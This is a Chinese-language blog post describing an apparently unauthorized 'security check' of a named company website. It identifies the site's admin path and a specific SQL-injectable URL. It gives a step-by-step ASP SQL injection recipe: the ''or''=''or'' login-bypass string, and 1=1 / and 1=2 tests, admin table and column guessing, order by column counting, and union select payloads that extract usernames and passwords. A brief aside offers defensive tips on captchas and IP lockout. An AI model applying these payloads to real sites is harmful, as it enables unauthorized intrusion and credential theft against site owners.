为学员检测网站

昨天晚上,QQ上学校的一学员,告诉我她老公的网站,其他的就不多说了吧,我看到网站后,检测了一下安全方面,连最简单的漏洞都没修补,网站是这个:http://www.cxqq.com下面开始检测一下了。
第一:首先先要找到后台,当然也可以直接找上传漏洞,这个我找了一下,没找到,然后就选择先找后台吧,一般的后台都会是admin,admin/login.asp,login.asp,admin.asp,manage等等就不一一列举了,这个可以用黑客工具,明小子或者啊D注入检测出后台,这个网站,检测到了后台地址是http://www.cxqq.com/manage? 找到后台了后,测试弱口令,弱口令就是万能钥匙,? 帐号:’or’’=’’or’ 密码:’or’’=’’or’?? 帐号和密码都是’or’’=’’or’,看了下他这个网站有验证码,在这里顺便一起说下网站后台的安全方面的知识吧,网站后台如果直接就是用户名和密码,然后没别的了,黑客可以暴力破解出你的帐号和密码,所以说帐号和密码设置的复杂一点比较好,不过设置的复杂一点,这样还是会被暴力破解的,只是时间问题了,在这里说一下我知道的网站后台安全三方面
1.?首先要保证你的后台的安全,别设置一些admin等常用目录,那样黑客直接用工具就可以扫到后台了,然后密码设置的复杂一点;
2.?然后就是在后台认证中加上验证码,这样就可以防止黑客的暴力破解,可以暴力破解,但是每次都要输入验证码,现在貌似一般黑客还写不出自动获取验证码并填写的程序,所以这样做是为了暴力破解;
3.?其实上面两个已经够安全了,如果还不放心可以再加一道防线,或者直接用这个,不用第二个也可以,这种方法叫做IP验证,就是如果一个外网IP登陆超过几次,就不可以登陆了,这样也是限制了暴力破解,除非你的罪黑客了,非要拿下你的站,那网站做的安全了,还可以入侵服务器呢,不过起码的保护我们要做好。。。
检测出了网站后台,然后用弱口令去尝试,我试过了。弱口令不管用,那只有找其他办法了…
? 第二:找注入点,这个也可以用啊D或者明小子检测的,或者手工去检测吧,and 1=1和and 1=2 如果一个返回正常网页,一个返回不正常网页,说明存在注入点,注入点就是可以通过这个 asp?id=? 这类的网页,直接操作数据库,上面那个网站,找到了好几个注入点,先说其中一个吧:
http://www.cxqq.com/cn/cpshow.asp?id=672&sort=82
通过他直接操作数据库,下面的任务就是猜解表名了,然后猜解字段名,然后登陆后台找备份数据库或者上传漏洞,拿服务器,这就是入侵asp网站其中的一种方法了,还有其他的暴力破解FTP,等等就不一一列举了,www.cxqq.com 这个网站,只用工具猜解到了表名,下面的字段名字就没猜解到了,如果有专业的黑客字典,肯定会猜解到了,然后按照上面的步骤,入侵这个网站很简单,这是我学校一个学员给我他对象的一个网站,我帮友情检测的,希望站长修补一下漏洞以防黑客非法入侵。。。

在这里再说一下手工入侵网站的步骤吧,当然用工具要明白了原理,然后才会手工检测,只会用工具,那不叫黑客,黑客这是个什么概念呢,想知道就自己百度去,嘿嘿。。。下面说下整理的入侵asp网站的步骤吧 。。。

第一: 查找注入点,? and 1=1? 和?? and 1=2
第二: 读表,?????? and (select count (*) from admin)
第三: 读字段,???? and (select count (username) from admin)
第四:? 查询记录,?? order by 37
第五:? 爆破用户名,
union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
from admin
第六: 爆破密码,
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
from admin
这就是六部了,我不是专业的黑客,只是了解而已,希望菜鸟们学会了技术不要破坏政府等公益性网站,当然老鸟肯定不会无聊的去入侵别人的网站了,因为中国的黑客也是很强大的,www.0535code.com学习编程从此变的轻松起来,我们的风格不是死学习,不是要程序玩转自己,而是自己学会学习,学会怎么让程序变得好玩,程序只要好玩了,那什么将都不再难了。。。嗯嗯,今天对于入侵网站就写到这里了。。。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.